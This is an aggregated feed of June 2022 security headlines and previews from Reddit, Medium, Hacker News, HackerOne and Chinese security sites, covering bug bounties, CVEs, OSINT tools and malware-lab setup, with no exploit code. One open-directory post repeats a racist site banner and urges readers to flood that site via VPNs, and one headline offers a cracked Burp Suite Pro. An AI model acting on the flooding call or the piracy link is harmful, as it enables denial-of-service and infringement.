    Hey all, After several years of self-teaching myself malware analysis, I was recently hired as a junior malware analyst for an IR company and I love it. Naturally, I want to practice at home in my free time as much as possible to continue learning. All of my independent analysis at home for learning purposes has been conducted in VMware for the ability to set everything up with my tools, snapshot, and go to town. As we all know, the problem with analyzing most modern malware on a VM is: Contains many methodologies to detect a virtual environment that is frankly a pain to attempt to circumvent. Only continues its malicious execution or drop/download of files from C2C if it can establish a genuine, consistent network connection. This is where isolating a VM from a network and attempting to use tools like FakeNet is rather difficult as while it's spoofing responses, the malware is still not able to download additional malicious files. That said, is it possible to take a laptop that I have and turn it into a glorified malware lab that can: Somehow contain the ability to revert to a "snapshot" as you'd see with a VM. Connect to my home network so the malware can send and receive legitimate network traffic while remaining separate from the other devices on my network (maybe a VLAN somehow?). Thank you, guys! submitted by /u/decyphier_ [link] [comments]
  • Open

    Russian tanks and other military stuff
    Russian tanks, pictures and blueprints http://armchairgeneral.com/rkkaww2/galleries/ ​ A blog from around 2001-2003, not much content but some interesting thoughts on Afghanistan from then along with a handful of pictures from there. http://www.nuui.com/Sections/ ​ airwar dot ru/other/ (Reddit auto spam filters hate this one which is why there's no URL) /draw, /draw2, and /draw3 have .zips of airplane diagrams, /manuals has a handful of plane manuals Also see airwar dot ru/image/ submitted by /u/c-rn [link] [comments]
    A Few ODs I have found in a span of a Couple Days.
    Some random ODs, not worth a single post, so I saved them and posting as a list. http://francois-planchu.com/images/(Someone's personal site, Random Pictures [Contains NSFW]) https://www.fundacionrenta.com/assets/ (Stock images, Fonts, and other assets) https://www.propweb.in/assets/ (More random assets) https://www.etrio.in/blog/ (Some Indian EV Website data, images, catalog, Promos) submitted by /u/amritajaatak [link] [comments]
    Time Magazine 1923-2014
    https://magazineproject.org/TIMEvault/ submitted by /u/c-rn [link] [comments]
    Does anyone else get a 403 Forbidden error when attempting to span hosts?
    As the title says. When I go to an imgur link directly, I can download just fine, but if I have to use the span hosts option in wget, I receive a 403 Forbidden error. Is there an explanation? submitted by /u/FuckedUpRetort [link] [comments]
    Commodore Amiga screenshots and box art
    http://www.amigalive.com/game-images/ submitted by /u/c-rn [link] [comments]
    Open directory of a cosplayer
    http://www.hosting.tk-lee.com/ Didn't look through everything so tagging nsfw submitted by /u/c-rn [link] [comments]
  • Open

    SecWiki News 2022-06-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-25 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    List of ARM cores affected by PACMAN vulnerability
    Article URL: https://developer.arm.com/documentation/ka005109/1-0?lang=en Comments URL: https://news.ycombinator.com/item?id=31876148 Points: 2 # Comments: 0
  • Open

    HDX (Headline Crypto) INCENTIVIZED TESTNET QUICK GUIDE, WITH 250,000 $HDX AS REWARDS
    HEADLINE Crypto is a Texas-based blockchain project and token from the team behind AlgoPay, AlgoCloud, Vaults Protocol, FORUM, PIPELINE-UI… Continue reading on Medium »
    INFORMATIX TESTNET COMPETITION QICK GUIDE, 750,000 $INFO tokens up for grabs
    Infomatix is a data collection tool that aims to build the worlds most comprehensive financial database through crowd sourced expertise. Continue reading on Medium »
    MSA Weekly 1 — “5 OS untuk Cyber Security”
    Jika kita membicarakan yang namanya Operating System (OS), sangatlah banyak diluar sana developer yang membuat/mendevelop Operating System… Continue reading on Medium »
    How I stopped hunting on HackerOne after years because they stole my $50k. And so should you.
    You may have heard about Belarusian security researcher xnwup and the story of blocking his $25k on HackerOne. It was pretty resonant at… Continue reading on Medium »
  • Open

    Next 13 Chrome extensions for OSINT
    We continue to look for extensions for the Google CHROME browser for you, which will help in the difficult task of finding information in… Continue reading on Medium »
    Instagram Information Gathering Tools
    I write this blog for those aspirants that have too enthusiastic to make a career in the field of Ethical hacking. for making a profession… Continue reading on Medium »
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Meta from HackTheBox — Detailed Walkthrough
    No content preview

  • Open

    Harmless NumPy issue receives CVE medium
    Article URL: https://github.com/numpy/numpy/issues/18993 Comments URL: https://news.ycombinator.com/item?id=31870409 Points: 3 # Comments: 0
  • Open

    Basic XSS Bypasses
    Alert(1) Continue reading on Medium »
    Cyber Security adalah suatu aktivitas yang dilakukan dengan tujuan untuk mengamankan serta mencegah…
    Dengan banyaknya kejadian cyber crime di seluruh dunia, ada baiknya kita harus menghasilkan dan mengumpulkan orang orang yang mahir dalam… Continue reading on Medium »
    Writing your own Burpsuite Extensions: Complete Guide
    Recently I had to create some extensions for Burpsuite. I tried finding resources that could help me but couldn’t find much. Most of them… Continue reading on Medium »
    IDOR leads to revoke access from third party user account
    Hello everyone , Continue reading on Medium »
    How I was able to delete any users’ OAUTH connections via IDOR
    ﷽ Continue reading on Medium »
    Sensitive Token Leakage from server side
    Hii all i have back with new Hacking story !!.so . One month Ago i was hunting on vdp program which is india’s one of the most successful… Continue reading on Medium »
    An Out Of Scope domain Leads To a Critical Bug[$1500]
    Hello All, I am Shakti Ranjan Mohanty (3ncryptsaan). Continue reading on Medium »
    CVE Hunting Tips #002
    Text Input Denials of Service Continue reading on The Mayor »
    SAUCERSWAP TESTNET BUG BOUNTY WITH 1,250,000 SAUCE AS REWARD
    About Sauceswap Continue reading on Medium »
  • Open

    [NSFW] Lots of beach cheeks
    submitted by /u/oDeathwingo [link] [comments]
    Radio Dramas
    https://ganahee.com/archive/Shows/ submitted by /u/c-rn [link] [comments]
    Index of /
    submitted by /u/taramj13 [link] [comments]
    Talking History - never been seen here before *apparently* & an oldie but a goodie - updated due to uhh... landing page.
    https://www.albany.edu/talkinghistory/pacifica-archives/ NO BLACKS NO INDIANS NO JEWS LIBERAL SUBNET BANS APPLIED CHINA AND RUSSIA WELCOME VISIT VIA: http://109.120.203.163/web/blyad.club/Music/ EDIT: Can I suggest we all use Chinese and Russian vpns to hammer the living shit out of blyad.club. submitted by /u/ringofyre [link] [comments]
  • Open

    CyberTalents — Airport
    Ok so OSINT was not my strong suit. Continue reading on Medium »
    War in Ukraine / June 23
    Ukraine retreats from Severodonetsk Continue reading on Medium »
  • Open

    Best thing to learn for SOC Analyst?
    Hey guys I am looking to get my Security+ by the end of the summer and finish my Cyber security related diploma in College by the end of the year. Any recommendations on which SIEM I should learn? What is most common? I was thinking ELK, Splunk, or QRadar? submitted by /u/kingkarmaxii [link] [comments]
    Signing into Windows 10 with a School account on a new User
    So I'm just starting Uni and I have been given a Microsoft 365 account from them. If I sign in as a new user on my PC with the school account, what data do they have access to? I have a D drive on my PC with family photos, receipts, tax info etc that I don't really want my school having access to. Are they able to see other drives on my device? or do they only see what's in OneDrive and what I do on edge while signed into my school's 365 account in the browser? Thanks! submitted by /u/Dazr87 [link] [comments]
  • Open

    Analyzing a macro enabled office file.
    Hi! So if you’re using Microsoft Office and you been around for quite a while. You probably heard about Macros? Continue reading on Medium »
    Red Team and Blue Team Training
    Modern malware actors get into the companies’ networks and steal any sensitive data they need. One of the effective ways to keep the… Continue reading on Medium »
  • Open

    Netsec Goggle for Brave Search
    submitted by /u/alxjsn [link] [comments]
    Hagana - A novel approach to runtime protection for NodeJS to prevent supply chain attacks
    submitted by /u/beckerman_jacob [link] [comments]
    Playing Docker? Bad Containers and What They Teach Us
    submitted by /u/Illustrious_Yard_576 [link] [comments]
    The curious tale of a fake Carrier.app
    submitted by /u/lormayna [link] [comments]
    CookieMonsteRCE: Stored XSS to RCE in Zena
    submitted by /u/jibblz [link] [comments]
    The Far Point of a Static Encounter
    submitted by /u/amirshk [link] [comments]
  • Open

    Looking for recommendations to include in a presentation for people starting out in DFIR
    What are some important things to discuss for people who may or may not be looking to have a career in DFIR? I'm mainly going to be talking about my career progression in DFIR (how I got into it, how I got into my current position, etc) but I want to make the majority of the presentation helpful and about the audience. How can I make it entertaining, engaging and knowledgeable? I don't want to make it too technical, as majority of the audience will be non-technical. Any help is appreciated! submitted by /u/haloman882 [link] [comments]
    Cellebrite vs. Oxygen
    Hi all I would like to ask what experiences you have had with both tools and where you see the advantages and disadvantages of the two solutions. As far as I know, cellebrite's strengths lie mainly in its support for older devices. I also find the tool a bit more user-friendly. I also noticed that with Oxygen it is not possible to hide all the data that you are no longer allowed to have in an OFBR backup. What are the other strengths and weaknesses of the tools mentioned? Many thanks for your help :) submitted by /u/B-Boy_DG_ [link] [comments]
    add NSRL hashset to EnCase Forensics V8.05
    Hi Forensicators, Pretty much what the title says, I am trying to add latest RDS minimal NSRL hashset to the EnCase Forensic v8.05. The hashset I downloaded from NIST website is a zip file which upon extraction are a bunch of text files. But I think EnCase is looking for a different format and throws an error that HashRoot.bin is not available. Can someone help me the link to download the latest NSRL hashset in the EnCase format or some other way to add this hashset. Thanks. submitted by /u/AcalTheNerd [link] [comments]
  • Open

    SecWiki News 2022-06-24 Review
    安全团队的演进及个人定位思考 by ourren 网络空间战场环境测绘初探 by ourren 复盘卫星大战 Hack-A-Sat 2 天基攻防竞赛 by ourren 复盘卫星大战 Hack-A-Sat 1 天基攻防竞赛 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-24 Review
    安全团队的演进及个人定位思考 by ourren 网络空间战场环境测绘初探 by ourren 复盘卫星大战 Hack-A-Sat 2 天基攻防竞赛 by ourren 复盘卫星大战 Hack-A-Sat 1 天基攻防竞赛 by ourren 更多最新文章,请访问SecWiki
  • Open

    静态代码分析之C语言篇
    从本篇起,笔者将开启c语言代码安全分析篇章,为大家详细剖析c语言静态代码分析的各种技术细节。
    FreeBuf早报 | 知网已被网络安全审查;攻击者利用Log4Shell入侵VMware服务器
    2022年6月23日,网络安全审查办公室约谈同方知网(北京)技术有限公司负责人,宣布对知网启动网络安全审查。
    Cunning Kitten–针对中东相关人士的威胁组织
    Cunning Kitten的攻击目标聚焦于世界各地的使用波斯语的相关人士,选取相关人士关心的政治话题发起攻击。
    QNAP发出警告,关键PHP漏洞可导致远程代码执行
    QNAP 正在解决一个关键的PHP 漏洞,该漏洞可能被用来实现远程代码执行。
    LambdaGuard:一款针对AWS无服务器环境安全的审计工具
    AWS Lambda是由Amazon Web Services提供的事件驱动的无服务器计算平台。
    NSO终于承认!至少5个欧洲国家正使用飞马间谍软件
    饱受争议的以色列监控软件供应商NSO Group向欧盟立法者承认,欧洲地区至少有五个国家使用了该公司的飞马(Pegasus)间谍软件。
    CISA:威胁行为者利用Log4Shell漏洞入侵VMware服务器
    近期,CISA表示,包括国家支持的黑客组织在内的威胁行为者仍在使用 Log4Shell (CVE-2021-44228) 远程代码执行漏洞针对 VMware Horizo​​n和统一访问网关 (UAG) 服务器。攻击者可以远程利用暴露于本地或Internet访问的脆弱服务器上的Log4Shell,在网络上横向移动,直到获得访问包含敏感数据的内部系统的权限。在2021年12月披露后,多个威胁参与者开
    FreeBuf周报 | 美当局称已捣毁僵尸网络RSOCKS;Facebook面临集体诉讼
    各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    2022年漏洞扫描工具TOP 10
    十大漏洞扫描工具盘点
    史上最能卷的勒索组织之一,每天工作时间超14小时
    连勒索组织都已经这么卷了,安全行业的压力有多大可想而知,只能被迫跟着卷起来。
  • Open

    ZAP Forced User Mode!!
    제가 작년부터 ZAP의 Authentication / Authorization 기능들에 대한 이야기를 많이 했었던 것 같습니다. 실제로 테스팅에도 많은 부분들을 적용하고 사용하고 있었습니다. Authentication Spidering in ZAP ZAP Script-base Authentication 등 다만 딱 하나 잘 손이 안가던 기능이 있었는데, 바로 Forced User Mode입니다. Forced User Mode 말 그대로 User를 강제하는 모드입니다. 우리가 보통 Context에서 Authentication을 설정하고 Spidering, ActiveScan 등에서 User를 선택하여 사용하는데, 이렇게 별도로 선택하지 않고 모든 기능에 해당 User를 기본으로 사용하도록 적용하는 모드입니다. 그래서 위와 같이 해당 상태에서 Proxy를 통해 페이지에 접근하면 자동으로 로그인 처리 후 세션을 설정해줍니다. 결국 로그인을 별도로 안하고 ZAP에서 세팅만 해두면, 매번 다른 계정으로 자동 로그인 처리가 가능한거죠 😍 Example 오늘도 테스트로 고생해주실 Starbucks입니다. Authentication 설정 후 Forced User Mode를 활성화하고 브라우저를 새로 열었습니다. 브라우저가 열리는 동안 ZAP은 자동으로 로그인 처리를 진행하며, 브라우저 화면을 잘 보시면 비인증 사용자에서 인증 사용자로 전환됩니다. Set user 그러면 Context 내 여러 User 를 등록하고 사용하는 경우에는 어떤 계정이 Forced User로 지정될까요? 바로 Context > Forced User에 명시된 계정으로 사용하게 됩니다. 보통 여러 계정을 기반으로 Access Control 등을 테스트하는 경우 Users 에 다수의 계정을 추가하게 되는데 이러한 설정을 통해서 원하는 계정으로 ZAP을 사용할 수 있도록 변경할 수 있습니다. Conclusion 저는 Spidering, ActiveScan 등의 기능에서만 사용자를 고정하는줄 알고 관심이 크게 없었는데, Proxy 전체에 사용자를...
  • Open

    There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families
    Learn about the unique implementations of API Hammering malware samples and how to mitigate them. The post There Is More Than One Way to Sleep: Dive Deep Into the Implementations of API Hammering by Various Malware Families appeared first on Unit 42.
  • Open

    WordPress WP HTML Mail plugin Vulnerable to XSS
    The XSS vulnerability in the WordPress WP HTML Mail plugin for personalized emails makes it vulnerable to code injection and phishing… Continue reading on Medium »

  • Open

    Chrome 104 Beta: New Media Query Syntax, Region Capture, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 104 is beta as of June 23, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Region Capture Chrome on Desktop can now crop self-captured video tracks. Web apps are already able to capture video in a tab using getDisplayMedia(). Region capture allows web apps to crop a track and remove content from it, typically before sharing it remotely. For example, consider a productivity web app with built-in video conferencing. During a video conference, a web app could use cropping to exclude th…
  • Open

    Burpsuite Pro crack Download in kali Linux
    Hello Friends Continue reading on Medium »
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello Beautiful hackers Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Intigriti — XSS Challenge — February 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    NahamCon CTF 2022 — Web Exploitation — All Challenges — Writeup
    Hello my name is rootjkqsta. I am Bug Bounty Hunter, Web App Pentester, Security Researcher and CTF player. So I was thinking why not to… Continue reading on Medium »
    Recon — All In One, Fast, Easy Recon Tool (HydraRecon)
    HydraRecon tool is an automated tool developed in the Python language which performs the task of Information Gathering and Crawling the… Continue reading on Medium »
  • Open

    DC Firewall segmentation alternatives
    Hello, We currently do not have any DC firewall at our healthcare facility. We cater for around 4000 users. It is a single site and there are remote vpn vendors connecting to support medical equipment. All vlans are behind the core switches. Now segmentation is one area we want to address, but not sure with plugging in a DC firewall is still the goto solution, as it can cause impact, be a SPOF. There are many other offerings claiming to do this , like NAC vendors, endpoint firewall agents , etc. I have been hearing positive things about Cisco tetration as well. Appreciate your inputs about segmentation paths experience other than internal/dc firewalling submitted by /u/MoeShea [link] [comments]
    Cheap and efficient way to host WP website in many different countries
    So for my undergraduate degree I'm developing a honeypot WordPress website and I want to host this website in different countries to see if the attacks differ depending on geographical differences. Now I can go ahead and buy a package from ex. Kinsta for 5 different websites and pay 150$ for that, but before I do that do you guys recommend any other more clever and more cost efficient idea to solve my issue. submitted by /u/krullmizter [link] [comments]
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Information Leak: Posted, Discovered & Misused! How easy for Criminals to get your data?
    No content preview
    Why is the Zero Trust Security Model Effective?
    No content preview
  • Open

    Ukraine War —  Geolocation #1
    On 08/03/2022, Twitter user @tinso_ww tweeted the following video consisting of two video clips taken from a UAV in Ukraine. Continue reading on Medium »
    War in Ukraine / June 22
    The Ukrainian agricultural sector estimates losses of $23 billion. This will also hurt world food prices Continue reading on Medium »
    OCTOSUITE — Advanced GitHub OSINT Framework
    OCTOSUITE é uma ferramenta que permite de forma prática extrair diversos dados de um perfil público do GitHub. Continue reading on 100security »
    OSINTEYE — PyPI, GitHub, Instagram e DockerHub
    OSINTEYE é uma ferramenta que permite de forma prática extrair diversos dados de um perfil público das plataformas PyPI, GitHub, Instagram… Continue reading on 100security »
    A short glossary of 12 Cybersecurity Techniques
    A short list of some cybersecurity techniques, both computer and human. Continue reading on Medium »
    Історія інтернету і перших пошукових систем
    Як, коли і ким був створений інтернет? Історія ARPANET. Про перші комп’ютерні мережі, FTP-сервери, веб-сканери, краулери і пошуковики. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    Fuzzing rust-minidump for Embarrassment and Crashes – Part 2
    Article URL: https://hacks.mozilla.org/2022/06/fuzzing-rust-minidump-for-embarrassment-and-crashes/ Comments URL: https://news.ycombinator.com/item?id=31852480 Points: 103 # Comments: 2
  • Open

    Any DFIR-Orc user who could help with KAPE embedding?
    Hello, I’m an intern in a company’s forensics lab. My job is to setup a DFIR-Orc (artifact collector from ANSSI), to replace the Velociraptor collector we currently use. Atm I’m having issues trying to embed Kape inside of Orc. I’m able to run KAPE from DFIR-Orc, but Kape isn’t able to find the .tkape files so it doesn’t collect anything of course. Did anyone know or already used DFIR-Orc here that would be willing to help? Thanks. Edit : I’ve tried to find ressources online, but nobody seems to have ever done this before, so I’m trying my luck here submitted by /u/Aigle13 [link] [comments]
  • Open

    This repo contains information about EDRs that can be useful during red team exercise.
    submitted by /u/M_Reza_Bakhtiyari [link] [comments]
    Miracle - One Vulnerability To Rule Them All
    submitted by /u/scopedsecurity [link] [comments]
    fuzzuli is a fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
    submitted by /u/0xmusana [link] [comments]
    Understanding the Compound File Binary Format and OLE Structures to Mess with CVE-2022-30190
    submitted by /u/canmaplap [link] [comments]
  • Open

    SecWiki News 2022-06-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    如何使用SMBSessionSpoofer伪造SMB会话
    SMBSessionSpoofer是一款针对SMB会话的安全工具,可以帮助广大研究人员轻松创建出一个伪造的SMB会话。
    云主机AKSK泄露利用
    云主机通过使用Access Key Id / Secret Access Key加密的方法来验证某个请求的发送者身份。
    FreeBuf早报 | 西北工业大学遭境外网络攻击;Conti勒索软件一个月内攻击40多个组织
    Lyceum 组织以针对中东能源和电信领域而闻名,并且主要依赖基于.NET 的恶意软件。
    如何使用Blackbird通过用户名来进行社交网站OSINT
    关于BlackbirdBlackbird是一款功能强大的公开资源情报收集工具,该工具可以帮助广大研究人员通过目标用户的用户名来快速搜索多达119个社交媒体网站,并收集相关账户的信息。Blackbird支持发送异步HTTP请求,因此可以大幅度提升运行效率和工具性能。功能特性1、本地Web服务器2、按用户名搜索3、元数据提取4、JSON数据读取和存储5、报告生成6、效率高速度快支持的社交媒体网站当前版
    立陶宛对俄罗斯“禁运”后遭网络攻击
    近日,新兴黑客组织“网络特种部队”(Cyber Spetsnaz) 或已将矛头对准了立陶宛的政府资源和关键基础设施。
    MEGA修复了允许解密用户数据的关键漏洞
    MEGA 发布了一个安全更新,以解决一系列可能会暴露用户数据的严重漏洞。
    《关于构建数据基础制度更好发挥数据要素作用的意见》审议通过
    数据基础制度建设事关国家发展和安全大局,要维护国家数据安全,保护个人信息和商业秘密,加快构建数据基础制度体系。
    基于ObRegisterCallbacks实现的进程保护功能
    本文将简单讲下如何使用ObRegisterCallbacks,实现进程保护功能。
    微软:俄罗斯将加强对乌克兰盟友的网络攻击
    俄罗斯情报机构已加强对乌克兰联盟国家政府的网络攻击。
    游戏安全丨喊话CALL分析-分析参数
    视频制作不易,求三联支持,拜谢~添加公众账号“极安御信安全研究院”,报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。进交流群报暗号“交流群”
    网安新势力创始人们,投资人和行业评委Pick谁?
    开启网安新宇宙,快来为您支持的创始人打Call!
    假如三国有网络安全攻防演练
    战争的本质是人与人之间的对抗,某种程度来说,网络攻防其实就是发生在虚拟世界中的战争。
  • Open

    Tails 5.1.1 is out – fixes high severity CVE-2021-38385
    Article URL: https://tails.boum.org/news/version_5.1.1/index.en.html Comments URL: https://news.ycombinator.com/item?id=31847510 Points: 2 # Comments: 0

  • Open

    Bypass for Domain-level redirects (Unvalidated Redirects and Forwar)
    GitLab disclosed a bug submitted by thypon: https://hackerone.com/reports/1582160
    Able to approve admin approval and change effective status without adding payment details .
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1543159 - Bounty: $5000
  • Open

    Recieved scam email and the "From" field was my email
    Hi. How attacker spoofed my email address? The email didn't pass the SPF and DMARC, but still I got the message. I got this email: https://www.brendinghat.com/2022/06/20/there-is-an-overdue-payment-under-your-name-please-settle-your-debts-asap/ submitted by /u/athanielx [link] [comments]
    Phone stolen, thief somehow got my banking into. Im confused as to how, help.
    So June 11th, I go out to a bar in downtown Montréal, my phone gets stolen, only my phone I still have my cards and all. I change my passcodes to everything that night, except my bank. I can’t Bcs I need the verification code they’d send to my phone. I have 2 factor authentication so the thief's would theoretically need my debit card number, my password, and the pin that gets sent to my phone to get into my mobile banking. Somehow today I get a “ pre authorized debit DOB” that pop up on my account for 999$, this type of transfer requires the thief to have my account number and the transit number, which are only in the mobile banking app. Now my question is, how would someone get the info off my mobile bank. ( oh also, I deactivated my SIM card the next morning after the theft, and through find my phone the minute the phone touches wifi it wipes all the contents) just confused as to how this possibly could have happened. submitted by /u/Working-Plantain8273 [link] [comments]
    Azure firewall log analysis tool
    What do you all use in the way of log analysis tools to monitor and dashboard out your firewall data as it pertains to the various managed resources w/in your environments that are externally facing? submitted by /u/Dalgan [link] [comments]
    Best Sandbox Solution(s)?
    Hello all. In a government subcontractor environment, I get asked a couple times a month, "This file is suspicious, can you open it in a sandbox for me?" But I am not sure what I can use to do this. I know Microsoft Office has a sandboxing capability but not sure how I make sure my file is opened in sandbox. It is quite finicky. Are there any other applications that can be used instead? What sandbox application/ solution are you using? T.I.A. submitted by /u/NoMomNotTheBelt14 [link] [comments]
  • Open

    Dos and Windows 3.x Software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Bug Bounty Tips #001
    Unverified Password Change Continue reading on The Mayor »
    Bug Bounty Tips #001
    Finding Projects Continue reading on The Mayor »
    $1500 Of Broken Access Controls
    Hello, Continue reading on Medium »
    Critical Git Repository Leaked Internal Data
    Description: Continue reading on Medium »
    2 GREAT TOOLS FOR PENTESTER
    Hi guys! I’m back with a new blog, this will be short but I think it’s great because I’ll show you two tools that are for me now basic for… Continue reading on Medium »
  • Open

    War in Ukraine / June 21
    Belarus continues to be a problem for Ukraine Continue reading on Medium »
    Proper Development Update of gotEM and Recent Events
    Hello community! Continue reading on Medium »
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial:Java 反序列化漏洞利用工具 by ourren 当 XM 12 遇到 eBPF by ourren 2022车联网数据安全监管研究报告 by ourren 电信网络诈骗黑灰产生态概览:基础设施 by ourren MITRE 供应链安全可信系统技术框架(SoT™) by ourren 测量哈萨克斯坦对 HTTPS 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-22 Review
    ysuserial:Java 反序列化漏洞利用工具 by ourren 当 XM 12 遇到 eBPF by ourren 2022车联网数据安全监管研究报告 by ourren 电信网络诈骗黑灰产生态概览:基础设施 by ourren MITRE 供应链安全可信系统技术框架(SoT™) by ourren 测量哈萨克斯坦对 HTTPS 的大规模拦截 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Improvements for Go fuzzing in version 1.19
    Article URL: https://www.code-intelligence.com/blog/fuzzing-golang-1.19 Comments URL: https://news.ycombinator.com/item?id=31835857 Points: 6 # Comments: 1
  • Open

    FreeBuf早报 | 一个开源代码项目平均有49个漏洞;亚马逊启动AWS量子网络中心
    欧洲刑警组织6月21日宣布解散一个涉足网络钓鱼、诈骗和洗钱活动的犯罪集团。
    工控安全遭严峻挑战,56个严重漏洞席卷OT 设备
    安全研究人员在10家OT供应商的产品中发现56个严重的安全漏洞,Forescout将这56期报告统称为“OT:ICEFALL”。
    如何实现与FDA保持邮件通信安全加密?
    本文关于如何实现与FDA保持邮件通信安全加密。
    Cloudflare服务中断致数百个网站瘫痪
    美国东部时间6月21日,网络基础设施服务提供商Cloudflare发生了一起故障,导致数百个网站大面积中断。
    新的DFSCoerce NTLM中继攻击允许攻击者控制Windows域
    安全专家发现了一种名为 DFSCoerce 的新型 Windows NTLM 中继攻击,它允许攻击者控制 Windows 域。
    警方捣毁造成数百万美元损失的网络钓鱼团伙
    在欧洲刑警组织协调的执法行动后,造成数百万欧元损失的网络钓鱼团伙成员被逮捕。
    CVE-2020-1472
    CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。
  • Open

    Semgrep rules for PHP security assessment
    submitted by /u/0xdea [link] [comments]
    ShoMon V2: Shodan Monitoring Integration for TheHive written in Golang
    submitted by /u/KaanSK [link] [comments]
  • Open

    简单聊下最近2个有意思的漏洞
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 前几天p0的blog更新一篇文章《An Autopsy on a Zombie In-the-Wild 0-day》 针对2022年2月份披露的一个在野漏洞CVE-2022-22620 “考古” 过程,还是比较有意...
  • Open

    简单聊下最近2个有意思的漏洞
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 前几天p0的blog更新一篇文章《An Autopsy on a Zombie In-the-Wild 0-day》 针对2022年2月份披露的一个在野漏洞CVE-2022-22620 “考古” 过程,还是比较有意...

  • Open

    Weak rate limit for SIGN.PLUS email verification
    Alohi disclosed a bug submitted by zeesozee: https://hackerone.com/reports/1584569
  • Open

    Do you know any good awareness blogs about malware and endpoint protection?
    Hello! Do you know any good awareness blogs/video/article about malware and endpoint protection? It should be to a user who is not familiar with cyber security. I found a lot of cool information about anti-phishing, but I need something more that focus on malware infection. submitted by /u/athanielx [link] [comments]
    SIEM Tools - AlienVault, possibly moving to Microsoft Sentinel
    Hi All, I've worked in AlienVault USM for 3 years now and do not love the SIEM feature or really anything about it. The company may be able to get Sentinel at a pretty fair price. Does anyone have experience with Sentinel or both tools? Or other recommendations for a "small" company with few security analysts. Healthcare Company size: 1,500 people Security Team: Very small, 2 people Thanks, submitted by /u/compguyguy [link] [comments]
    Pentesting DNS?
    I was assigned to do a “DNS pentest”. That’s what they call but I have no idea where to start with or what do I need to ask the Network team. Do I need some credentials or anything? Appreciate all the answers. submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Securing a private database
    I’m interested in understanding the common ways people secure their internal database for access by, for example, developers. Example one, for an on-premise database do you just use a vpn and local database users? Or do you connect the database to some sort of single sign on where possible? How would you audit this? Example two, For a private database in a public cloud how do you control connectivity? Do you use a vpn for that too or a bastion host or just security group settings (for AWS for example)? For both these examples, how would you scale tracking and managing users, credentials and authz (who’s allowed to do what) at scale? Thanks for any feedback. submitted by /u/cewdesign [link] [comments]
  • Open

    $1,500 XSS — what to consider during the bug bounty
    Hello folks, long time no see! I recently got my bounty from one of private programs on HackerOne and wanted to talked about it, share my… Continue reading on Medium »
    IDOR vulnerability
    1- What’s the IDOR? Continue reading on Medium »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    Hi Hackers! Welcome back to my new write-up. My name is Krishnadev P Melevila. I am a 20-Year-old Self-Learned Ethical Hacker. Continue reading on InfoSec Write-ups »
    I Found IDOR In Private Program Via API
    WHOAMI: Continue reading on Medium »
    Java Application -Server Side Template Injection
    Description: Continue reading on Medium »
  • Open

    War in Ukraine / June 20
    👉 Laws passed by the Verkhovna Rada of Ukraine during the 110 days of the war Continue reading on Medium »
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    Container escapes: Detecting abuses of Linux capabilities with Falco + Intro to CAP_SYS_ADMIN
    submitted by /u/capitangolo [link] [comments]
    A deep dive into Sigma rules and how to write your own threat detection rules
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering an old Mario & Luigi game for fun
    submitted by /u/CyberMasterV [link] [comments]
    Intercepting MS Teams Communication
    submitted by /u/OwnPreparation3424 [link] [comments]
    When the CAS let you in - abusing misconfigured Actuator in Apereo CAS
    submitted by /u/qwerty0x41 [link] [comments]
    Does Acrobat Reader Unload Injection of Security Products?
